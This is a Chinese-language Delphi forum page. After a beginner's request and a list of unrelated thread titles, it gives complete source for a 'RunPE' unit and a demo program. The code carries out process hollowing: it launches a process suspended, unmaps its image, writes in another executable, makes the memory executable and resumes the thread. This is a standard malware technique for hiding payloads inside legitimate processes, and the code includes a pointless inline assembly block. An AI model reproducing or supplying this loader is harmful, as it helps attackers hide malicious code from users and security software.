本人是菜鸟,希望能解答详细些呵。
解决方案 »
- 求救环境出错问题.
- delphi中帮助文件是如何创建的呀,请教
- 请教一个数据库连接问题,多谢(Missing data provider or data packet)
- ODBC+ADOQuery1,以“时间”为条件对数据库中的信息进行查找,为何无法显示数据(用到DateTimePicker控件)
- FormActivate不執行。。。
- 高分求救。打包问题,谢谢
- 使用INDY POP3控件时收下来的PDF附件有时不正常
- 求救:如何由实例句柄HINSTANCE获得窗口句柄HWND?
- Delphi XE7 开发按Android软件遇到屏幕自适应的问题。
- 关于 TFileStream 之二
- 我要地址我要地址我要地址我要地址我要地址我要地址指向pnl1.Components[i]) 的地址
- 做了7年的ERP开发,到头来没有用我之地啊
uRunPE单元unit uRunPE;interfaceuses Windows;type
TByteArray = array of Byte;function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
function NtUnmapViewOfSection(ProcessHandle: THandle; BaseAddress: Pointer): DWORD; stdcall; external 'ntdll.dll';implementationprocedure Move(Destination, Source: Pointer; dLength:Cardinal);
begin
CopyMemory(Destination, Source, dLength);
end;function RunEXE(sVictim:string; bFile:TByteArray):Boolean;
var
IDH: TImageDosHeader;
INH: TImageNtHeaders;
ISH: TImageSectionHeader;
PI: TProcessInformation;
SI: TStartUpInfo;
CONT: TContext;
ImageBase: Pointer;
Ret: DWORD;
i: integer;
Addr: DWORD;
dOffset: DWORD;
begin
Result := FALSE;
try
Move(@IDH, @bFile[0], 64);
if IDH.e_magic = IMAGE_DOS_SIGNATURE then
begin
Move(@INH, @bFile[IDH._lfanew], 248);
if INH.Signature = IMAGE_NT_SIGNATURE then
begin
FillChar(SI, SizeOf(TStartupInfo),#0);
FillChar(PI, SizeOf(TProcessInformation),#0);
SI.cb := SizeOf(TStartupInfo);
if CreateProcess(nil, PChar(sVictim), nil, nil, FALSE, CREATE_SUSPENDED, nil, nil, SI, PI) then
begin
CONT.ContextFlags := CONTEXT_FULL;
if GetThreadContext(PI.hThread, CONT) then
begin
ReadProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @Addr, 4, Ret);
NtUnmapViewOfSection(PI.hProcess, @Addr);
ImageBase := VirtualAllocEx(PI.hProcess, Ptr(INH.OptionalHeader.ImageBase), INH.OptionalHeader.SizeOfImage, MEM_RESERVE or MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(PI.hProcess, ImageBase, @bFile[0], INH.OptionalHeader.SizeOfHeaders, Ret);
dOffset := IDH._lfanew + 248;
for i := 0 to INH.FileHeader.NumberOfSections - 1 do
begin
Move(@ISH, @bFile[dOffset + (i * 40)], 40);
WriteProcessMemory(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), @bFile[ISH.PointerToRawData], ISH.SizeOfRawData, Ret);
VirtualProtectEx(PI.hProcess, Ptr(Cardinal(ImageBase) + ISH.VirtualAddress), ISH.Misc.VirtualSize, PAGE_EXECUTE_READWRITE, @Addr);
end;
WriteProcessMemory(PI.hProcess, Ptr(CONT.Ebx + 8), @ImageBase, 4, Ret);
CONT.Eax := Cardinal(ImageBase) + INH.OptionalHeader.AddressOfEntryPoint;
asm
pushad
mov eax,$00401000
mov ebp,esp
sub edx,$00010000
popad
end;
SetThreadContext(PI.hThread, CONT);
ResumeThread(PI.hThread);
Result := TRUE;
end;
end;
end;
end;
except
CloseHandle(PI.hProcess);
CloseHandle(PI.hThread);
end;
end;end.
使用例子:
program RunPE;uses
Windows,
uRunPE;var
bBuff: TByteArray;{$R 1.res}function FileToBytes(sPath:string; var bFile:TByteArray):Boolean;
var
hFile: THandle;
dSize: DWORD;
dRead: DWORD;
begin
Result := FALSE;
hFile := CreateFile(PChar(sPath), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, 0, 0);
if hFile <> INVALID_HANDLE_VALUE then
begin
dSize := GetFileSize(hFile, nil);
SetLength(bFile, dSize);
ReadFile(hFile, bFile[0], dSize, dRead, nil);
CloseHandle(hFile); if dRead = dSize then
Result := TRUE;
end;
end;begin
if FileToBytes('notepad.exe', bBuff) then
RunExe(ParamStr(0), bBuff);
end.
上面的例子是把记事本程序在runpe.exe中执行。